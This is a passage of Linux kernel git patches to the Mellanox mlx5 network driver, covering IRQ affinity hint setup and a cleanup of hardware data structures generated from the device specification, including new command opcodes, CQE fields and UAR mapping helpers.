&dev->priv.eq_table; @@ -549,7 +630,7 @@ static void free_comp_eqs(struct mlx5_core_dev *dev) static int alloc_comp_eqs(struct mlx5_core_dev *dev) { struct mlx5_eq_table *table = &dev->priv.eq_table; - char name[MLX5_MAX_EQ_NAME]; + char name[MLX5_MAX_IRQ_NAME]; struct mlx5_eq *eq; int ncomp_vec; int nent; @@ -566,7 +647,7 @@ static int alloc_comp_eqs(struct mlx5_core_dev *dev) goto clean; } - snprintf(name, MLX5_MAX_EQ_NAME, "mlx5_comp%d", i); + snprintf(name, MLX5_MAX_IRQ_NAME, "mlx5_comp%d", i); err = mlx5_create_map_eq(dev, eq, i + MLX5_EQ_VEC_COMP_BASE, nent, 0, name, &dev->priv.uuari.uars[0]); @@ -730,6 +811,12 @@ static int mlx5_dev_init(struct mlx5_core_dev *dev, struct pci_dev *pdev) goto err_stop_eqs; } + err = mlx5_irq_set_affinity_hints(dev); + if (err) { + dev_err(&pdev->dev, "Failed to alloc affinity hint cpumask\n"); + goto err_free_comp_eqs; + } + MLX5_INIT_DOORBELL_LOCK(&priv->cq_uar_lock); mlx5_init_cq_table(dev); @@ -739,6 +826,9 @@ static int mlx5_dev_init(struct mlx5_core_dev *dev, struct pci_dev *pdev) return 0; +err_free_comp_eqs: + free_comp_eqs(dev); + err_stop_eqs: mlx5_stop_eqs(dev); @@ -793,6 +883,7 @@ static void mlx5_dev_cleanup(struct mlx5_core_dev *dev) mlx5_cleanup_srq_table(dev); mlx5_cleanup_qp_table(dev); mlx5_cleanup_cq_table(dev); + mlx5_irq_clear_affinity_hints(dev); free_comp_eqs(dev); mlx5_stop_eqs(dev); mlx5_free_uuars(dev, &priv->uuari); diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index c4cf25ffcc16..9e8979502826 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -85,7 +85,7 @@ enum { }; enum { - MLX5_MAX_EQ_NAME = 32 + MLX5_MAX_IRQ_NAME = 32 }; enum { @@ -349,7 +349,6 @@ struct mlx5_eq { u8 eqn; int nent; u64 mask; - char name[MLX5_MAX_EQ_NAME]; struct list_head list; int index; struct mlx5_rsc_debug *dbg; @@ -412,7 +411,6 @@ struct mlx5_eq_table { struct mlx5_eq pages_eq; struct mlx5_eq async_eq; struct mlx5_eq cmd_eq; - struct msix_entry *msix_arr; int num_comp_vectors; /* protect EQs list */ @@ -465,9 +463,16 @@ struct mlx5_mr_table { struct radix_tree_root tree; }; +struct mlx5_irq_info { + cpumask_var_t mask; + char name[MLX5_MAX_IRQ_NAME]; +}; + struct mlx5_priv { char name[MLX5_MAX_NAME_LEN]; struct mlx5_eq_table eq_table; + struct msix_entry *msix_arr; + struct mlx5_irq_info *irq_info; struct mlx5_uuar_info uuari; MLX5_DECLARE_DOORBELL_LOCK(cq_uar_lock); From e281682bf29438848daac11627216bceb1507b71 Mon Sep 17 00:00:00 2001 From: Saeed Mahameed Date: Thu, 28 May 2015 22:28:40 +0300 Subject: [PATCH 494/872] net/mlx5_core: HW data structs/types definitions cleanup mlx5_ifc.h was heavily modified here since it is now generated by a script from the device specification (PRM rev 0.25). This specification is backward compatible to existing hardware. Some structures/fields were added here in order to enable the Ethernet functionality of the driver. Signed-off-by: Saeed Mahameed Signed-off-by: Amir Vadai Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx5/core/cmd.c | 17 +- drivers/net/ethernet/mellanox/mlx5/core/fw.c | 2 +- .../net/ethernet/mellanox/mlx5/core/main.c | 7 +- drivers/net/ethernet/mellanox/mlx5/core/mcg.c | 2 +- drivers/net/ethernet/mellanox/mlx5/core/uar.c | 37 + include/linux/mlx5/device.h | 113 +- include/linux/mlx5/driver.h | 4 +- include/linux/mlx5/mlx5_ifc.h | 6608 ++++++++++++++++- include/linux/mlx5/qp.h | 25 + 9 files changed, 6705 insertions(+), 110 deletions(-) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c index e3273faf4568..2f22cd2de2b0 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c @@ -390,8 +390,17 @@ const char *mlx5_command_str(int command) case MLX5_CMD_OP_ARM_RQ: return "ARM_RQ"; - case MLX5_CMD_OP_RESIZE_SRQ: - return "RESIZE_SRQ"; + case MLX5_CMD_OP_CREATE_XRC_SRQ: + return "CREATE_XRC_SRQ"; + + case MLX5_CMD_OP_DESTROY_XRC_SRQ: + return "DESTROY_XRC_SRQ"; + + case MLX5_CMD_OP_QUERY_XRC_SRQ: + return "QUERY_XRC_SRQ"; + + case MLX5_CMD_OP_ARM_XRC_SRQ: + return "ARM_XRC_SRQ"; case MLX5_CMD_OP_ALLOC_PD: return "ALLOC_PD"; @@ -408,8 +417,8 @@ const char *mlx5_command_str(int command) case MLX5_CMD_OP_ATTACH_TO_MCG: return "ATTACH_TO_MCG"; - case MLX5_CMD_OP_DETACH_FROM_MCG: - return "DETACH_FROM_MCG"; + case MLX5_CMD_OP_DETTACH_FROM_MCG: + return "DETTACH_FROM_MCG"; case MLX5_CMD_OP_ALLOC_XRCD: return "ALLOC_XRCD"; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fw.c b/drivers/net/ethernet/mellanox/mlx5/core/fw.c index 4b4cda3bcc5f..ef9b7695decd 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/fw.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/fw.c @@ -95,7 +95,7 @@ int mlx5_query_odp_caps(struct mlx5_core_dev *dev, struct mlx5_odp_caps *caps) goto out; } - memcpy(caps, MLX5_ADDR_OF(query_hca_cap_out, out, capability_struct), + memcpy(caps, MLX5_ADDR_OF(query_hca_cap_out, out, capability), sizeof(*caps)); mlx5_core_dbg(dev, "on-demand paging capabilities:\nrc: %08x\nuc: %08x\nud: %08x\n", diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c index 55085b01b4ce..a652cb93ceaa 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/main.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c @@ -319,8 +319,7 @@ static void fw2drv_caps(struct mlx5_caps *caps, void *out) gen->max_srq_wqes = 1 << MLX5_GET_PR(cmd_hca_cap, out, log_max_srq_sz); gen->max_wqes = 1 << MLX5_GET_PR(cmd_hca_cap, out, log_max_qp_sz); gen->log_max_qp = MLX5_GET_PR(cmd_hca_cap, out, log_max_qp); - gen->log_max_strq = MLX5_GET_PR(cmd_hca_cap, out, log_max_strq_sz); - gen->log_max_srq = MLX5_GET_PR(cmd_hca_cap, out, log_max_srqs); + gen->log_max_srq = MLX5_GET_PR(cmd_hca_cap, out, log_max_srq); gen->max_cqes = 1 << MLX5_GET_PR(cmd_hca_cap, out, log_max_cq_sz); gen->log_max_cq = MLX5_GET_PR(cmd_hca_cap, out, log_max_cq); gen->max_eqes = 1 << MLX5_GET_PR(cmd_hca_cap, out, log_max_eq_sz); @@ -391,7 +390,7 @@ int mlx5_core_get_caps(struct mlx5_core_dev *dev, struct mlx5_caps *caps, goto query_ex; } mlx5_core_dbg(dev, "%s\n", caps_opmod_str(opmod)); - fw2drv_caps(caps, MLX5_ADDR_OF(query_hca_cap_out, out, capability_struct)); + fw2drv_caps(caps, MLX5_ADDR_OF(query_hca_cap_out, out, capability)); query_ex: kfree(out); @@ -453,7 +452,7 @@ static int handle_hca_cap(struct mlx5_core_dev *dev) /* disable checksum */ cur_caps->gen.flags &= ~MLX5_DEV_CAP_FLAG_CMDIF_CSUM; - copy_rw_fields(MLX5_ADDR_OF(set_hca_cap_in, set_ctx, hca_capability_struct), + copy_rw_fields(MLX5_ADDR_OF(set_hca_cap_in, set_ctx, capability), cur_caps); err = set_caps(dev, set_ctx, set_sz); diff --git a/drivers/net/ethernet/mellanox/mlx5/core/mcg.c b/drivers/net/ethernet/mellanox/mlx5/core/mcg.c index d79fd85d1dd5..d5a0c2d61a18 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/mcg.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/mcg.c @@ -91,7 +91,7 @@ int mlx5_core_detach_mcg(struct mlx5_core_dev *dev, union ib_gid *mgid, u32 qpn) memset(&in, 0, sizeof(in)); memset(&out, 0, sizeof(out)); - in.hdr.opcode = cpu_to_be16(MLX5_CMD_OP_DETACH_FROM_MCG); + in.hdr.opcode = cpu_to_be16(MLX5_CMD_OP_DETTACH_FROM_MCG); memcpy(in.gid, mgid, sizeof(*mgid)); in.qpn = cpu_to_be32(qpn); err = mlx5_cmd_exec(dev, &in, sizeof(in), &out, sizeof(out)); diff --git a/drivers/net/ethernet/mellanox/mlx5/core/uar.c b/drivers/net/ethernet/mellanox/mlx5/core/uar.c index 5a89bb1d678a..ba58f6d7c761 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/uar.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/uar.c @@ -223,3 +223,40 @@ int mlx5_free_uuars(struct mlx5_core_dev *dev, struct mlx5_uuar_info *uuari) return 0; } + +int mlx5_alloc_map_uar(struct mlx5_core_dev *mdev, struct mlx5_uar *uar) +{ + phys_addr_t pfn; + phys_addr_t uar_bar_start; + int err; + + err = mlx5_cmd_alloc_uar(mdev, &uar->index); + if (err) { + mlx5_core_warn(mdev, "mlx5_cmd_alloc_uar() failed, %d\n", err); + return err; + } + + uar_bar_start = pci_resource_start(mdev->pdev, 0); + pfn = (uar_bar_start >> PAGE_SHIFT) + uar->index; + uar->map = ioremap(pfn << PAGE_SHIFT, PAGE_SIZE); + if (!uar->map) { + mlx5_core_warn(mdev, "ioremap() failed, %d\n", err); + err = -ENOMEM; + goto err_free_uar; + } + + return 0; + +err_free_uar: + mlx5_cmd_free_uar(mdev, uar->index); + + return err; +} +EXPORT_SYMBOL(mlx5_alloc_map_uar); + +void mlx5_unmap_free_uar(struct mlx5_core_dev *mdev, struct mlx5_uar *uar) +{ + iounmap(uar->map); + mlx5_cmd_free_uar(mdev, uar->index); +} +EXPORT_SYMBOL(mlx5_unmap_free_uar); diff --git a/include/linux/mlx5/device.h b/include/linux/mlx5/device.h index abf65c790421..feebed7b392b 100644 --- a/include/linux/mlx5/device.h +++ b/include/linux/mlx5/device.h @@ -35,6 +35,7 @@ #include #include +#include #if defined(__LITTLE_ENDIAN) #define MLX5_SET_HOST_ENDIANNESS 0 @@ -70,6 +71,14 @@ << __mlx5_dw_bit_off(typ, fld))); \ } while (0) +#define MLX5_SET_TO_ONES(typ, p, fld) do { \ + BUILD_BUG_ON(__mlx5_st_sz_bits(typ) % 32); \ + *((__be32 *)(p) + __mlx5_dw_off(typ, fld)) = \ + cpu_to_be32((be32_to_cpu(*((__be32 *)(p) + __mlx5_dw_off(typ, fld))) & \ + (~__mlx5_dw_mask(typ, fld))) | ((__mlx5_mask(typ, fld)) \ + << __mlx5_dw_bit_off(typ, fld))); \ +} while (0) + #define MLX5_GET(typ, p, fld) ((be32_to_cpu(*((__be32 *)(p) +\ __mlx5_dw_off(typ, fld))) >> __mlx5_dw_bit_off(typ, fld)) & \ __mlx5_mask(typ, fld)) @@ -264,6 +273,7 @@ enum { MLX5_OPCODE_RDMA_WRITE_IMM = 0x09, MLX5_OPCODE_SEND = 0x0a, MLX5_OPCODE_SEND_IMM = 0x0b, + MLX5_OPCODE_LSO = 0x0e, MLX5_OPCODE_RDMA_READ = 0x10, MLX5_OPCODE_ATOMIC_CS = 0x11, MLX5_OPCODE_ATOMIC_FA = 0x12, @@ -541,6 +551,10 @@ struct mlx5_cmd_prot_block { u8 sig; }; +enum { + MLX5_CQE_SYND_FLUSHED_IN_ERROR = 5, +}; + struct mlx5_err_cqe { u8 rsvd0[32]; __be32 srqn; @@ -554,13 +568,22 @@ struct mlx5_err_cqe { }; struct mlx5_cqe64 { - u8 rsvd0[17]; + u8 rsvd0[4]; + u8 lro_tcppsh_abort_dupack; + u8 lro_min_ttl; + __be16 lro_tcp_win; + __be32 lro_ack_seq_num; + __be32 rss_hash_result; + u8 rss_hash_type; u8 ml_path; - u8 rsvd20[4]; + u8 rsvd20[2]; + __be16 check_sum; __be16 slid; __be32 flags_rqpn; - u8 rsvd28[4]; - __be32 srqn; + u8 hds_ip_ext; + u8 l4_hdr_type_etc; + __be16 vlan_info; + __be32 srqn; /* [31:24]: lro_num_seg, [23:0]: srqn */ __be32 imm_inval_pkey; u8 rsvd40[4]; __be32 byte_cnt; @@ -571,6 +594,40 @@ struct mlx5_cqe64 { u8 op_own; }; +static inline int get_cqe_lro_tcppsh(struct mlx5_cqe64 *cqe) +{ + return (cqe->lro_tcppsh_abort_dupack >> 6) & 1; +} + +static inline u8 get_cqe_l4_hdr_type(struct mlx5_cqe64 *cqe) +{ + return (cqe->l4_hdr_type_etc >> 4) & 0x7; +} + +static inline int cqe_has_vlan(struct mlx5_cqe64 *cqe) +{ + return !!(cqe->l4_hdr_type_etc & 0x1); +} + +enum { + CQE_L4_HDR_TYPE_NONE = 0x0, + CQE_L4_HDR_TYPE_TCP_NO_ACK = 0x1, + CQE_L4_HDR_TYPE_UDP = 0x2, + CQE_L4_HDR_TYPE_TCP_ACK_NO_DATA = 0x3, + CQE_L4_HDR_TYPE_TCP_ACK_AND_DATA = 0x4, +}; + +enum { + CQE_RSS_HTYPE_IP = 0x3 << 6, + CQE_RSS_HTYPE_L4 = 0x3 << 2, +}; + +enum { + CQE_L2_OK = 1 << 0, + CQE_L3_OK = 1 << 1, + CQE_L4_OK = 1 << 2, +}; + struct mlx5_sig_err_cqe { u8 rsvd0[16]; __be32 expected_trans_sig; @@ -996,4 +1053,52 @@ struct mlx5_destroy_psv_out { u8 rsvd[8]; }; +#define MLX5_CMD_OP_MAX 0x920 + +enum { + VPORT_STATE_DOWN = 0x0, + VPORT_STATE_UP = 0x1, +}; + +enum { + MLX5_L3_PROT_TYPE_IPV4 = 0, + MLX5_L3_PROT_TYPE_IPV6 = 1, +}; + +enum { + MLX5_L4_PROT_TYPE_TCP = 0, + MLX5_L4_PROT_TYPE_UDP = 1, +}; + +enum { + MLX5_HASH_FIELD_SEL_SRC_IP = 1 << 0, + MLX5_HASH_FIELD_SEL_DST_IP = 1 << 1, + MLX5_HASH_FIELD_SEL_L4_SPORT = 1 << 2, + MLX5_HASH_FIELD_SEL_L4_DPORT = 1 << 3, + MLX5_HASH_FIELD_SEL_IPSEC_SPI = 1 << 4, +}; + +enum { + MLX5_MATCH_OUTER_HEADERS = 1 << 0, + MLX5_MATCH_MISC_PARAMETERS = 1 << 1, + MLX5_MATCH_INNER_HEADERS = 1 << 2, + +}; + +enum { + MLX5_FLOW_TABLE_TYPE_NIC_RCV = 0, + MLX5_FLOW_TABLE_TYPE_ESWITCH = 4, +}; + +enum { + MLX5_FLOW_CONTEXT_DEST_TYPE_VPORT = 0, + MLX5_FLOW_CONTEXT_DEST_TYPE_FLOW_TABLE = 1, + MLX5_FLOW_CONTEXT_DEST_TYPE_TIR = 2, +}; + +enum { + MLX5_RQC_RQ_TYPE_MEMORY_RQ_INLINE = 0x0, + MLX5_RQC_RQ_TYPE_MEMORY_RQ_RPM = 0x1, +}; + #endif /* MLX5_DEVICE_H */ diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index 9e8979502826..3fd4fdc1ba16 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -44,7 +44,6 @@ #include #include -#include enum { MLX5_BOARD_ID_LEN = 64, @@ -278,7 +277,6 @@ struct mlx5_general_caps { u8 log_max_mkey; u8 log_max_pd; u8 log_max_srq; - u8 log_max_strq; u8 log_max_mrw_sz; u8 log_max_bsf_list_size; u8 log_max_klm_list_size; @@ -664,6 +662,8 @@ int mlx5_cmd_alloc_uar(struct mlx5_core_dev *dev, u32 *uarn); int mlx5_cmd_free_uar(struct mlx5_core_dev *dev, u32 uarn); int mlx5_alloc_uuars(struct mlx5_core_dev *dev, struct mlx5_uuar_info *uuari); int mlx5_free_uuars(struct mlx5_core_dev *dev, struct mlx5_uuar_info *uuari); +int mlx5_alloc_map_uar(struct mlx5_core_dev *mdev, struct mlx5_uar *uar); +void mlx5_unmap_free_uar(struct mlx5_core_dev *mdev, struct mlx5_uar *uar); void mlx5_health_cleanup(void); void __init mlx5_health_init(void); void mlx5_start_health_poll(struct mlx5_core_dev *dev); diff --git a/include/linux/mlx5/mlx5_ifc.h b/include/linux/mlx5/mlx5_ifc.h index cb3ad17edd1f..b27e9f6e090a 100644 --- a/include/linux/mlx5/mlx5_ifc.h +++ b/include/linux/mlx5/mlx5_ifc.h @@ -1,5 +1,5 @@ /* - * Copyright (c) 2013-2015, Mellanox Technologies. All rights reserved. + * Copyright (c) 2013-2015, Mellanox Technologies, Ltd. All rights reserved. * * This software is available to you under a choice of one of two * licenses. You may choose to be licensed under the terms of the GNU @@ -28,11 +28,44 @@ * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. - */ - +*/ #ifndef MLX5_IFC_H #define MLX5_IFC_H +enum { + MLX5_EVENT_TYPE_CODING_COMPLETION_EVENTS = 0x0, + MLX5_EVENT_TYPE_CODING_PATH_MIGRATED_SUCCEEDED = 0x1, + MLX5_EVENT_TYPE_CODING_COMMUNICATION_ESTABLISHED = 0x2, + MLX5_EVENT_TYPE_CODING_SEND_QUEUE_DRAINED = 0x3, + MLX5_EVENT_TYPE_CODING_LAST_WQE_REACHED = 0x13, + MLX5_EVENT_TYPE_CODING_SRQ_LIMIT = 0x14, + MLX5_EVENT_TYPE_CODING_DCT_ALL_CONNECTIONS_CLOSED = 0x1c, + MLX5_EVENT_TYPE_CODING_DCT_ACCESS_KEY_VIOLATION = 0x1d, + MLX5_EVENT_TYPE_CODING_CQ_ERROR = 0x4, + MLX5_EVENT_TYPE_CODING_LOCAL_WQ_CATASTROPHIC_ERROR = 0x5, + MLX5_EVENT_TYPE_CODING_PATH_MIGRATION_FAILED = 0x7, + MLX5_EVENT_TYPE_CODING_PAGE_FAULT_EVENT = 0xc, + MLX5_EVENT_TYPE_CODING_INVALID_REQUEST_LOCAL_WQ_ERROR = 0x10, + MLX5_EVENT_TYPE_CODING_LOCAL_ACCESS_VIOLATION_WQ_ERROR = 0x11, + MLX5_EVENT_TYPE_CODING_LOCAL_SRQ_CATASTROPHIC_ERROR = 0x12, + MLX5_EVENT_TYPE_CODING_INTERNAL_ERROR = 0x8, + MLX5_EVENT_TYPE_CODING_PORT_STATE_CHANGE = 0x9, + MLX5_EVENT_TYPE_CODING_GPIO_EVENT = 0x15, + MLX5_EVENT_TYPE_CODING_REMOTE_CONFIGURATION_PROTOCOL_EVENT = 0x19, + MLX5_EVENT_TYPE_CODING_DOORBELL_BLUEFLAME_CONGESTION_EVENT = 0x1a, + MLX5_EVENT_TYPE_CODING_STALL_VL_EVENT = 0x1b, + MLX5_EVENT_TYPE_CODING_DROPPED_PACKET_LOGGED_EVENT = 0x1f, + MLX5_EVENT_TYPE_CODING_COMMAND_INTERFACE_COMPLETION = 0xa, + MLX5_EVENT_TYPE_CODING_PAGE_REQUEST = 0xb +}; + +enum { + MLX5_MODIFY_TIR_BITMASK_LRO = 0x0, + MLX5_MODIFY_TIR_BITMASK_INDIRECT_TABLE = 0x1, + MLX5_MODIFY_TIR_BITMASK_HASH = 0x2, + MLX5_MODIFY_TIR_BITMASK_TUNNELED_OFFLOAD_EN = 0x3 +}; + enum { MLX5_CMD_OP_QUERY_HCA_CAP = 0x100, MLX5_CMD_OP_QUERY_ADAPTER = 0x101, @@ -43,6 +76,8 @@ enum { MLX5_CMD_OP_QUERY_PAGES = 0x107, MLX5_CMD_OP_MANAGE_PAGES = 0x108, MLX5_CMD_OP_SET_HCA_CAP = 0x109, + MLX5_CMD_OP_QUERY_ISSI = 0x10a, + MLX5_CMD_OP_SET_ISSI = 0x10b, MLX5_CMD_OP_CREATE_MKEY = 0x200, MLX5_CMD_OP_QUERY_MKEY = 0x201, MLX5_CMD_OP_DESTROY_MKEY = 0x202, @@ -66,6 +101,7 @@ enum { MLX5_CMD_OP_2ERR_QP = 0x507, MLX5_CMD_OP_2RST_QP = 0x50a, MLX5_CMD_OP_QUERY_QP = 0x50b, + MLX5_CMD_OP_SQD_RTS_QP = 0x50c, MLX5_CMD_OP_INIT2INIT_QP = 0x50e, MLX5_CMD_OP_CREATE_PSV = 0x600, MLX5_CMD_OP_DESTROY_PSV = 0x601, @@ -73,7 +109,10 @@ enum { MLX5_CMD_OP_DESTROY_SRQ = 0x701, MLX5_CMD_OP_QUERY_SRQ = 0x702, MLX5_CMD_OP_ARM_RQ = 0x703, - MLX5_CMD_OP_RESIZE_SRQ = 0x704, + MLX5_CMD_OP_CREATE_XRC_SRQ = 0x705, + MLX5_CMD_OP_DESTROY_XRC_SRQ = 0x706, + MLX5_CMD_OP_QUERY_XRC_SRQ = 0x707, + MLX5_CMD_OP_ARM_XRC_SRQ = 0x708, MLX5_CMD_OP_CREATE_DCT = 0x710, MLX5_CMD_OP_DESTROY_DCT = 0x711, MLX5_CMD_OP_DRAIN_DCT = 0x712, @@ -85,8 +124,12 @@ enum { MLX5_CMD_OP_MODIFY_ESW_VPORT_CONTEXT = 0x753, MLX5_CMD_OP_QUERY_NIC_VPORT_CONTEXT = 0x754, MLX5_CMD_OP_MODIFY_NIC_VPORT_CONTEXT = 0x755, - MLX5_CMD_OP_QUERY_RCOE_ADDRESS = 0x760, + MLX5_CMD_OP_QUERY_ROCE_ADDRESS = 0x760, MLX5_CMD_OP_SET_ROCE_ADDRESS = 0x761, + MLX5_CMD_OP_QUERY_HCA_VPORT_CONTEXT = 0x762, + MLX5_CMD_OP_MODIFY_HCA_VPORT_CONTEXT = 0x763, + MLX5_CMD_OP_QUERY_HCA_VPORT_GID = 0x764, + MLX5_CMD_OP_QUERY_HCA_VPORT_PKEY = 0x765, MLX5_CMD_OP_QUERY_VPORT_COUNTER = 0x770, MLX5_CMD_OP_ALLOC_Q_COUNTER = 0x771, MLX5_CMD_OP_DEALLOC_Q_COUNTER = 0x772, @@ -98,7 +141,7 @@ enum { MLX5_CMD_OP_CONFIG_INT_MODERATION = 0x804, MLX5_CMD_OP_ACCESS_REG = 0x805, MLX5_CMD_OP_ATTACH_TO_MCG = 0x806, - MLX5_CMD_OP_DETACH_FROM_MCG = 0x807, + MLX5_CMD_OP_DETTACH_FROM_MCG = 0x807, MLX5_CMD_OP_GET_DROPPED_PACKET_LOG = 0x80a, MLX5_CMD_OP_MAD_IFC = 0x50d, MLX5_CMD_OP_QUERY_MAD_DEMUX = 0x80b, @@ -106,23 +149,22 @@ enum { MLX5_CMD_OP_NOP = 0x80d, MLX5_CMD_OP_ALLOC_XRCD = 0x80e, MLX5_CMD_OP_DEALLOC_XRCD = 0x80f, - MLX5_CMD_OP_SET_BURST_SIZE = 0x812, - MLX5_CMD_OP_QUERY_BURST_SZIE = 0x813, - MLX5_CMD_OP_ACTIVATE_TRACER = 0x814, - MLX5_CMD_OP_DEACTIVATE_TRACER = 0x815, - MLX5_CMD_OP_CREATE_SNIFFER_RULE = 0x820, - MLX5_CMD_OP_DESTROY_SNIFFER_RULE = 0x821, - MLX5_CMD_OP_QUERY_CONG_PARAMS = 0x822, - MLX5_CMD_OP_MODIFY_CONG_PARAMS = 0x823, - MLX5_CMD_OP_QUERY_CONG_STATISTICS = 0x824, + MLX5_CMD_OP_ALLOC_TRANSPORT_DOMAIN = 0x816, + MLX5_CMD_OP_DEALLOC_TRANSPORT_DOMAIN = 0x817, + MLX5_CMD_OP_QUERY_CONG_STATUS = 0x822, + MLX5_CMD_OP_MODIFY_CONG_STATUS = 0x823, + MLX5_CMD_OP_QUERY_CONG_PARAMS = 0x824, + MLX5_CMD_OP_MODIFY_CONG_PARAMS = 0x825, + MLX5_CMD_OP_QUERY_CONG_STATISTICS = 0x826, + MLX5_CMD_OP_ADD_VXLAN_UDP_DPORT = 0x827, + MLX5_CMD_OP_DELETE_VXLAN_UDP_DPORT = 0x828, + MLX5_CMD_OP_SET_L2_TABLE_ENTRY = 0x829, + MLX5_CMD_OP_QUERY_L2_TABLE_ENTRY = 0x82a, + MLX5_CMD_OP_DELETE_L2_TABLE_ENTRY = 0x82b, MLX5_CMD_OP_CREATE_TIR = 0x900, MLX5_CMD_OP_MODIFY_TIR = 0x901, MLX5_CMD_OP_DESTROY_TIR = 0x902, MLX5_CMD_OP_QUERY_TIR = 0x903, - MLX5_CMD_OP_CREATE_TIS = 0x912, - MLX5_CMD_OP_MODIFY_TIS = 0x913, - MLX5_CMD_OP_DESTROY_TIS = 0x914, - MLX5_CMD_OP_QUERY_TIS = 0x915, MLX5_CMD_OP_CREATE_SQ = 0x904, MLX5_CMD_OP_MODIFY_SQ = 0x905, MLX5_CMD_OP_DESTROY_SQ = 0x906, @@ -135,9 +177,430 @@ enum { MLX5_CMD_OP_MODIFY_RMP = 0x90d, MLX5_CMD_OP_DESTROY_RMP = 0x90e, MLX5_CMD_OP_QUERY_RMP = 0x90f, - MLX5_CMD_OP_SET_FLOW_TABLE_ENTRY = 0x910, - MLX5_CMD_OP_QUERY_FLOW_TABLE_ENTRY = 0x911, - MLX5_CMD_OP_MAX = 0x911 + MLX5_CMD_OP_CREATE_TIS = 0x912, + MLX5_CMD_OP_MODIFY_TIS = 0x913, + MLX5_CMD_OP_DESTROY_TIS = 0x914, + MLX5_CMD_OP_QUERY_TIS = 0x915, + MLX5_CMD_OP_CREATE_RQT = 0x916, + MLX5_CMD_OP_MODIFY_RQT = 0x917, + MLX5_CMD_OP_DESTROY_RQT = 0x918, + MLX5_CMD_OP_QUERY_RQT = 0x919, + MLX5_CMD_OP_CREATE_FLOW_TABLE = 0x930, + MLX5_CMD_OP_DESTROY_FLOW_TABLE = 0x931, + MLX5_CMD_OP_QUERY_FLOW_TABLE = 0x932, + MLX5_CMD_OP_CREATE_FLOW_GROUP = 0x933, + MLX5_CMD_OP_DESTROY_FLOW_GROUP = 0x934, + MLX5_CMD_OP_QUERY_FLOW_GROUP = 0x935, + MLX5_CMD_OP_SET_FLOW_TABLE_ENTRY = 0x936, + MLX5_CMD_OP_QUERY_FLOW_TABLE_ENTRY = 0x937, + MLX5_CMD_OP_DELETE_FLOW_TABLE_ENTRY = 0x938 +}; + +struct mlx5_ifc_flow_table_fields_supported_bits { + u8 outer_dmac[0x1]; + u8 outer_smac[0x1]; + u8 outer_ether_type[0x1]; + u8 reserved_0[0x1]; + u8 outer_first_prio[0x1]; + u8 outer_first_cfi[0x1]; + u8 outer_first_vid[0x1]; + u8 reserved_1[0x1]; + u8 outer_second_prio[0x1]; + u8 outer_second_cfi[0x1]; + u8 outer_second_vid[0x1]; + u8 reserved_2[0x1]; + u8 outer_sip[0x1]; + u8 outer_dip[0x1]; + u8 outer_frag[0x1]; + u8 outer_ip_protocol[0x1]; + u8 outer_ip_ecn[0x1]; + u8 outer_ip_dscp[0x1]; + u8 outer_udp_sport[0x1]; + u8 outer_udp_dport[0x1]; + u8 outer_tcp_sport[0x1]; + u8 outer_tcp_dport[0x1]; + u8 outer_tcp_flags[0x1]; + u8 outer_gre_protocol[0x1]; + u8 outer_gre_key[0x1]; + u8 outer_vxlan_vni[0x1]; + u8 reserved_3[0x5]; + u8 source_eswitch_port[0x1]; + + u8 inner_dmac[0x1]; + u8 inner_smac[0x1]; + u8 inner_ether_type[0x1]; + u8 reserved_4[0x1]; + u8 inner_first_prio[0x1]; + u8 inner_first_cfi[0x1]; + u8 inner_first_vid[0x1]; + u8 reserved_5[0x1]; + u8 inner_second_prio[0x1]; + u8 inner_second_cfi[0x1]; + u8 inner_second_vid[0x1]; + u8 reserved_6[0x1]; + u8 inner_sip[0x1]; + u8 inner_dip[0x1]; + u8 inner_frag[0x1]; + u8 inner_ip_protocol[0x1]; + u8 inner_ip_ecn[0x1]; + u8 inner_ip_dscp[0x1]; + u8 inner_udp_sport[0x1]; + u8 inner_udp_dport[0x1]; + u8 inner_tcp_sport[0x1]; + u8 inner_tcp_dport[0x1]; + u8 inner_tcp_flags[0x1]; + u8 reserved_7[0x9]; + + u8 reserved_8[0x40]; +}; + +struct mlx5_ifc_flow_table_prop_layout_bits { + u8 ft_support[0x1]; + u8 reserved_0[0x1f]; + + u8 reserved_1[0x2]; + u8 log_max_ft_size[0x6]; + u8 reserved_2[0x10]; + u8 max_ft_level[0x8]; + + u8 reserved_3[0x20]; + + u8 reserved_4[0x18]; + u8 log_max_ft_num[0x8]; + + u8 reserved_5[0x18]; + u8 log_max_destination[0x8]; + + u8 reserved_6[0x18]; + u8 log_max_flow[0x8]; + + u8 reserved_7[0x40]; + + struct mlx5_ifc_flow_table_fields_supported_bits ft_field_support; + + struct mlx5_ifc_flow_table_fields_supported_bits ft_field_bitmask_support; +}; + +struct mlx5_ifc_odp_per_transport_service_cap_bits { + u8 send[0x1]; + u8 receive[0x1]; + u8 write[0x1]; + u8 read[0x1]; + u8 reserved_0[0x1]; + u8 srq_receive[0x1]; + u8 reserved_1[0x1a]; +}; + +struct mlx5_ifc_fte_match_set_lyr_2_4_bits { + u8 smac_47_16[0x20]; + + u8 smac_15_0[0x10]; + u8 ethertype[0x10]; + + u8 dmac_47_16[0x20]; + + u8 dmac_15_0[0x10]; + u8 first_prio[0x3]; + u8 first_cfi[0x1]; + u8 first_vid[0xc]; + + u8 ip_protocol[0x8]; + u8 ip_dscp[0x6]; + u8 ip_ecn[0x2]; + u8 vlan_tag[0x1]; + u8 reserved_0[0x1]; + u8 